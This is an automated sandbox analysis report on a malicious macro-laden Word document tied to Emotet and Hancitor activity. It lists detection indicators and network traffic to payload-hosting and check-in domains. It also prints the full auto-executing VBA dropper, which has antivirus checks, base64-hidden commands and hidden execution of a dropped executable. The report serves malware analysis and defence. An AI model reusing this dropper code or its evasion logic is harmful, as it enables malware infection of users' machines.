2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
This report is generated from a file or URL submitted to this webservice on December 10th 2018 19:26:21 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
-
Hooks API calls
POSTs files to a webserver - Fingerprint
- Tries to identify its external IP address
- Evasive
-
Checks network status using ping
Detected document macro trying to fingerprint/evade the analysis environment
Uses ping excessively (often used to bypass analysis) - Network Behavior
- Contacts 6 domains and 6 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 16
-
Anti-Reverse Engineering
-
Uses ping excessively (often used to bypass analysis)
- details
- Process "PING.EXE" with commandline "ping localhost -n 100" (Show Process)
- source
- Monitored Target
- relevance
- 7/10
-
Uses ping excessively (often used to bypass analysis)
-
Environment Awareness
-
Detected document macro trying to fingerprint/evade the analysis environment
- details
- Document contains auto-execute macro and tries to obtain external IP/ISP/host information
- source
- Indicator Combinations
- relevance
- 10/10
- ATT&CK ID
- T1063 (Show technique in the MITRE ATT&CK™ matrix)
-
Detected document macro trying to fingerprint/evade the analysis environment
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET POLICY External IP Lookup api.ipify.org" (SID: 2021997, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin" (SID: 2819978, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "CrowdStrike Hancitor POST Request" (SID: 181610701, Rev: 20160930, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ET TROJAN Fareit/Pony Downloader Checkin 2" (SID: 2014411, Rev: 11, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "CrowdStrike Pony Request" (SID: 181708101, Rev: 20170522, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)" (SID: 2824549, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 29/62 Antivirus vendors marked sample as malicious (46% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 29/62 Antivirus vendors marked sample as malicious (46% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache"
"GET /wp-includes/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache"
"GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache
Connection: Keep-Alive"
"GET /wp-content/themes/twentyfourteen/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache"
"GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache
Connection: Keep-Alive"
"GET /wp-includes/customize/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: hk3fitness.com
Cache-Control: no-cache"
"GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: hk3fitness.com
Cache-Control: no-cache
Connection: Keep-Alive"
"GET /modules/DesignManager/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sycamoreelitefitness.com
Cache-Control: no-cache"
"GET /wp-includes/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache"
"GET /wp-content/themes/twentyfourteen/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache" - source
- Network Traffic
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
- details
- 15/69 Antivirus vendors marked dropped file "extra_embedded_0.exe.bin" as malicious (classified as "DangerousObject.Multi" with 21% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Document spawns new processes
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "54.204.36.156": ...
URL: http://api.ipify.org/ (AV positives: 1/70 scanned on 12/07/2018 01:58:48)
URL: http://api.ipify.org/?format=jsonp&callback=jQuery111203746056614909321_1544045586789&_=1544045586790 (AV positives: 1/70 scanned on 12/06/2018 17:33:25)
File SHA256: 3159ea711927cc57efcb9e8421097a06b073469a16a7797270cf9a424925ea28 (Date: 12/10/2018 14:04:18)
File SHA256: 29025295e50125251ffed2456706f58f4db08f86a1c30dc9e90b87a1d8717b56 (Date: 12/10/2018 04:48:27)
File SHA256: d28e09fa1b7eaae44be9e2ceb5d7e70268994e905d0ddb3ef6350f6e6b8c8f6e (AV positives: 14/70 scanned on 12/08/2018 17:02:00)
File SHA256: c24ad8e67355cc7992a8b1854f38a16712846af7ac3099794609d7f731ffd944 (AV positives: 35/70 scanned on 12/08/2018 03:31:12)
File SHA256: bf2ff9b64b4da1c401e365500ce55ca32c1d708ad5f2366fe93027df3e9d8fb2 (AV positives: 48/69 scanned on 12/07/2018 05:17:25)
File SHA256: e5ceeb1f78b683a3efecf77e2d5b8251b04281cd12ebfc374d36cfb62a92d657 (AV positives: 45/70 scanned on 12/07/2018 13:53:47)
File SHA256: 9617dd0af3b935fda4be31beeaeee45dac40d33a36b92e70a3fa0e0407e1836e (AV positives: 55/69 scanned on 12/06/2018 22:39:33)
Found malicious artifacts related to "192.232.216.139": ...
URL: http://itssprout.com/wp-includes/3 (AV positives: 3/69 scanned on 12/10/2018 15:38:19)
URL: http://itssprout.com/wp-includes/1 (AV positives: 2/69 scanned on 12/10/2018 15:28:42)
URL: http://lifewithoutsocialmedia.com/plugin/installment/log/linkedin/Linkedin/SignIn.php (AV positives: 6/66 scanned on 12/08/2018 22:14:38)
URL: http://lifewithoutsocialmedia.com/wp-includes/log/Made-in-China.htm (AV positives: 5/66 scanned on 12/08/2018 06:10:20)
URL: http://curtispattee.com/wp-houses/landing.php (AV positives: 7/66 scanned on 12/08/2018 01:46:17)
File SHA256: 0ff0b7fcb090c65d0bdcb2af4bbd2c30f33356b3ce9b117186fa20391ef840a3 (AV positives: 14/59 scanned on 10/06/2018 13:10:24)
File SHA256: 6a67d85a3740ab6e955afd67cc06d70b48e8b94551b689434b79262256c2843a (AV positives: 1/59 scanned on 09/11/2018 22:36:27)
File SHA256: 1fd8f6e5b0f4ea03d3e6c80a2e236825ec1076a1b4c684b4f2174aa97d71a340 (AV positives: 2/71 scanned on 01/12/2018 21:36:19)
File SHA256: c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16 (AV positives: 7/60 scanned on 12/28/2017 00:40:22)
File SHA256: 98461340a03e38489be1d94d658fed973f09572733a0077ba64ed69524104391 (AV positives: 7/59 scanned on 12/27/2017 13:41:18)
Found malicious artifacts related to "192.185.226.114": ...
URL: http://apathtoinnerpeace.com/ (AV positives: 2/69 scanned on 12/10/2018 17:13:55)
URL: http://apathtoinnerpeace.com/wp-content/themes/twentyfourteen/3 (AV positives: 3/69 scanned on 12/10/2018 15:37:47)
URL: http://sapsters.com/verification/login/ (AV positives: 4/66 scanned on 11/25/2018 10:04:34)
URL: http://sapsters.com/ (AV positives: 4/66 scanned on 11/25/2018 09:46:43)
URL: http://sapsters.com/verification/login (AV positives: 5/66 scanned on 11/25/2018 09:45:17)
File SHA256: 0ff0b7fcb090c65d0bdcb2af4bbd2c30f33356b3ce9b117186fa20391ef840a3 (AV positives: 5/70 scanned on 12/10/2018 10:00:07)
File SHA256: 7e22921d6da964161efd526eb4f20885636692270c9ea8cad4bd35b7d5c91fae (AV positives: 1/59 scanned on 05/22/2018 21:56:48)
File SHA256: 0ee05882414e66190bdad594144843bcc8e45c48accc5f35091c5220ffea1c4d (AV positives: 1/69 scanned on 02/03/2018 08:22:58)
File SHA256: 632c5ad13e9055b1b3df787155f6f337dc78d6dad78e82cc9c8f3c472cf843bf (AV positives: 21/59 scanned on 09/05/2017 16:05:05)
File SHA256: 206e7c8b25977ae8ef62e77f7d313f6da86dcd5c3a7f2718b78f1e9fc13af786 (AV positives: 22/55 scanned on 07/01/2017 19:43:45)
Found malicious artifacts related to "192.232.223.6": ...
URL: http://hk3fitness.com/wp-includes/customize/2 (AV positives: 2/66 scanned on 12/10/2018 15:51:55)
URL: http://hk3fitness.com/wp-includes/customize/3 (AV positives: 3/69 scanned on 12/10/2018 15:37:15)
URL: http://hk3fitness.com/wp-includes/customize/1 (AV positives: 2/69 scanned on 12/10/2018 15:28:50)
URL: http://facebook.c0m.us/ (AV positives: 4/66 scanned on 12/09/2018 14:52:42)
URL: http://maximaproducts.com/ (AV positives: 1/66 scanned on 11/26/2018 03:43:31)
File SHA256: 0ff0b7fcb090c65d0bdcb2af4bbd2c30f33356b3ce9b117186fa20391ef840a3 (AV positives: 5/57 scanned on 12/10/2018 15:51:59)
File SHA256: 6a67d85a3740ab6e955afd67cc06d70b48e8b94551b689434b79262256c2843a (AV positives: 1/58 scanned on 10/06/2018 06:41:22)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/58 scanned on 05/20/2018 08:54:26)
File SHA256: 1ecd310e4d695de451b10553e5826f3f94b576d670cfeddfa8e44184e8d5c92d (AV positives: 22/60 scanned on 05/17/2018 12:00:43)
File SHA256: e4dc8df8d9ad03364e5d6f7f047ae3bc3506ebe25299c3d52b6ed9482fc61db1 (AV positives: 23/54 scanned on 01/22/2017 17:21:17)
Found malicious artifacts related to "209.188.93.46": ...
URL: http://sycamoreelitefitness.com/modules/DesignManager/1 (AV positives: 4/69 scanned on 12/10/2018 16:53:32)
URL: http://sycamoreelitefitness.com/modules/DesignManager/3 (AV positives: 4/69 scanned on 12/10/2018 15:36:42)
URL: http://gotdeerdown.com/.well-known/acme-challenge/myfibank/account/alert.php (AV positives: 11/66 scanned on 12/10/2018 14:20:03)
URL: https://gotdeerdown.com/.well-known/acme-challenge/myfibank/account/ (AV positives: 13/70 scanned on 12/10/2018 13:18:47)
URL: http://gotdeerdown.com/.well-known/acme-challenge/myfibank/account (AV positives: 9/66 scanned on 12/10/2018 12:46:14)
File SHA256: c36dc9b569912514f8a19d08c47c30359de7fbd5406535c2247de5a532f4d7f1 (AV positives: 1/57 scanned on 12/06/2018 06:05:40)
File SHA256: 8a482f2271a42c5f54c96e816a84340a6f2357a5b81f927d07d00788f5140a41 (AV positives: 1/72 scanned on 12/02/2018 16:50:24)
File SHA256: 70a6e1ce252450fea32f008e3916ab173413a364f5b7b14b734d0c7838859b96 (AV positives: 1/59 scanned on 10/18/2018 19:16:11)
File SHA256: fdf900267092bc67bd7786b86c462e69f9ed52bed838809b6ba28b298be879f6 (AV positives: 1/58 scanned on 09/03/2018 22:21:52)
File SHA256: 50ee7f9c8783ddd975938d6d7316340c08da4d52579c1914d2888fd7798c26ee (AV positives: 3/60 scanned on 07/17/2018 08:00:54) - source
- Network Traffic
- relevance
- 10/10
-
Tries to identify its external IP address
- details
- "api.ipify.org"
- source
- Network Traffic
- relevance
- 6/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
-
Found keyword "Document_Open" which indicates: "Runs when the Word or Publisher document is opened"
Found keyword "Document_Close" which indicates: "Runs when the Word document is closed" - source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Document analysis contacts a domain
- details
-
Often seen on documents with macro droppers
embedded files or exploits - source
- Indicator Combinations
- relevance
- 3/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 16
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
1/66 reputation engines marked "http://api.ipify.org" as malicious (1% detection rate)
1/68 reputation engines marked "http://sycamoreelitefitness.com" as malicious (1% detection rate)
2/69 reputation engines marked "http://apathtoinnerpeace.com" as malicious (2% detection rate) - source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
General
-
POSTs files to a webserver
- details
-
"POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: henmerecrob.com
Content-Length: 112
Cache-Control: no-cache" with no payload
"POST /mlu/forum.php HTTP/1.0
Host: henmerecrob.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 206
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" with no payload - source
- Network Traffic
- relevance
- 5/10
-
POSTs files to a webserver
-
Installation/Persistance
-
Drops executable files
- details
- "extra_embedded_0.exe.bin" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\PING.EXE" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\PING.EXE" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\PING.EXE" (Handle: 84) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Drops executable files
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 54.204.36.156 on port 80 is sent without HTTP header
TCP traffic to 185.244.149.11 on port 80 is sent without HTTP header
TCP traffic to 192.232.216.139 on port 80 is sent without HTTP header
TCP traffic to 192.185.226.114 on port 80 is sent without HTTP header
TCP traffic to 192.232.223.6 on port 80 is sent without HTTP header
TCP traffic to 209.188.93.46 on port 80 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- source
- Network Traffic
- relevance
- 10/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Spyware/Information Retrieval
-
Checks network status using ping
- details
- Process "PING.EXE" with commandline "ping localhost -n 100" (Show Process)
- source
- Monitored Target
- relevance
- 5/10
- ATT&CK ID
- T1018 (Show technique in the MITRE ATT&CK™ matrix)
-
Checks network status using ping
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
- details
-
"extra_embedded_0.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "vbHide" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Output" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Print #" which indicates: "May write to a file (if combined with Open)"
Found suspicious keyword "Environ" which indicates: "May read system environment variables"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "CopyFile" which indicates: "May copy a file" - source
- Static Parser
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "10661eaa" to virtual address "0x2F681B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "e99a5431f1" to virtual address "0x76A63E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e481bf1" to virtual address "0x76B93D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b84013966bffe0" to virtual address "0x75591248" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e9603332f1" to virtual address "0x76A64731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x755912CC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8115975" to virtual address "0x755A83C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8115975" to virtual address "0x755A834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b8b015966bffe0" to virtual address "0x755911F8" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A83C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A8348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e9239934f1" to virtual address "0x76A65DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x7559139C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A83DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "68130000" to virtual address "0x75A61680" (part of module "WS2_32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x755912DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A8364" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "4053597758585a77186a5a77653c5b770000000000bfb8760000000056ccb876000000007ccab87600000000376873756a2c5b77d62d5b7700000000206973750000000029a6b87600000000a48d737500000000f70eb87600000000" to virtual address "0x76911000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "c4cab87680bbb876aa6eb9769fbbb87608bbb87646ceb8766138b976de2fb976d0d9b8760000000017792c774f912c777f6f2c77f4f72c7711f72c77f2832c77857e2c7700000000" to virtual address "0x6F301000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "b83012966bffe0" to virtual address "0x75A61368" (part of module "WS2_32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 5 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 15
-
Environment Awareness
-
Possibly tries to detect the presence of a debugger
- details
- GetProcessHeap@KERNEL32.DLL from extra_embedded_0.exe (PID: 2768) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Possibly tries to detect the presence of a debugger
-
General
-
Contacts domains
- details
-
"api.ipify.org"
"henmerecrob.com"
"itssprout.com"
"apathtoinnerpeace.com"
"hk3fitness.com"
"sycamoreelitefitness.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"54.204.36.156:80"
"185.244.149.11:80"
"192.232.216.139:80"
"192.185.226.114:80"
"192.232.223.6:80"
"209.188.93.46:80" - source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: "Private Sub Document_Open()
On Error Resume Next
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveRight Unit:=wdCharacter, Count:=24
Selection.TypeBackspace
Selection.Copy
Call sdfsdf
Call cek
Call killo
End Sub
Private Sub Document_Close()
Call closee
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function"
File "bbbbbbb.bas" (Streampath: "VBA/bbbbbbb") has code: "Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub"
File "eeeeee.bas" (Streampath: "VBA/eeeeee") has code: "Sub closee()
Dim jddsdfda As String
jddsdfda = UserForm5.TextBox1.Text
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Dim nuchevi
nuchevi = UserForm6.TextBox1.Text
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim lhjxvcvx
lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
Dim kkkdds
kkkdds = StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
If True = IsExeRunning(jddsdfda) Then
Open Environ("Temp") & "\1.hta" For Output As #1
Print #1, kkkdds
Print #1, lhjxvcvx
Close #1
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
End If
If True = IsExeRunning("PS" & "UAM" & "ain" & nuchevi) Then
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("n360" & nuchevi) Then
Call sla(1)
Exit Sub
End If
If True = IsExeRunning("PccNT" & nuchevi) Then
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("uiSeAgnt" & nuchevi) Then
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("mbam" & nuchevi) Then
Open Environ("Temp") & "\1s.bat" For Output As #1
Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
Close
Shell Environ("Temp") & "\1s.bat", vbHide
Exit Sub
End If
If True = IsExeRunning("mbamtray" & nuchevi) Then
Open Environ("Temp") & "\1s.bat" For Output As #1
Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
Close
Shell Environ("Temp") & "\1s.bat", vbHide
Exit Sub
End If
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("X" & "DYuc" & "Glm"), vbUnicode), vbHide
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function IsExeRunning(sExeName As String, Optional sComputer As String = ".") As Boolean
Dim objProcesses As Object
Set objProcesses = GetObject("w" & "in" & "mg" & "mts" & ":{impersonationLevel=impersonate}!\\" & sComputer & "\root\cimv2").ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & sExeName & "'")
If objProcesses.Count <> 0 Then IsExeRunning = True
End Function
Sub sla(num)
Select Case num
Case 1
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Case Else
End Select
End Sub"
File "Aaaaaa.bas" (Streampath: "VBA/Aaaaaa") has code: "Sub cek()
Set D = New DataObject
D.SetText " "
D.PutInClipboard
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveLeft Unit:=wdCharacter, Count:=13
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
End Sub"
File "cccccc.bas" (Streampath: "VBA/cccccc") has code: "Sub fadf()
Dim pl, kk
kk = ".com"
pl = "L" & kk
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="6" & pl, Destination:="6" & ".pif"
End Sub
Sub sdfsdf()
ChDir Environ("Temp")
Call kklk
Call fadf
Selection.TypeBackspace
End Sub"
File "UserForm3.frm" (Streampath: "VBA/UserForm3") has code: ""
File "UserForm1.frm" (Streampath: "VBA/UserForm1") has code: ""
File "ddddd.bas" (Streampath: "VBA/ddddd") has code: "Sub kklk()
ChDir Environ("Temp")
Dim kk, lll, jgf, tyretw, gdfsfsa
jgf = StrConv(DecodeBase64("ZXhl"), vbUnicode)
kk = ".com"
lll = "6"
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="6L" & kk, Destination:=lll & "." & jgf
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function"
File "UserForm2.frm" (Streampath: "VBA/UserForm2") has code: ""
File "UserForm4.frm" (Streampath: "VBA/UserForm4") has code: ""
File "UserForm5.frm" (Streampath: "VBA/UserForm5") has code: ""
File "UserForm6.frm" (Streampath: "VBA/UserForm6") has code: "" - source
- Static Parser
- relevance
- 10/10
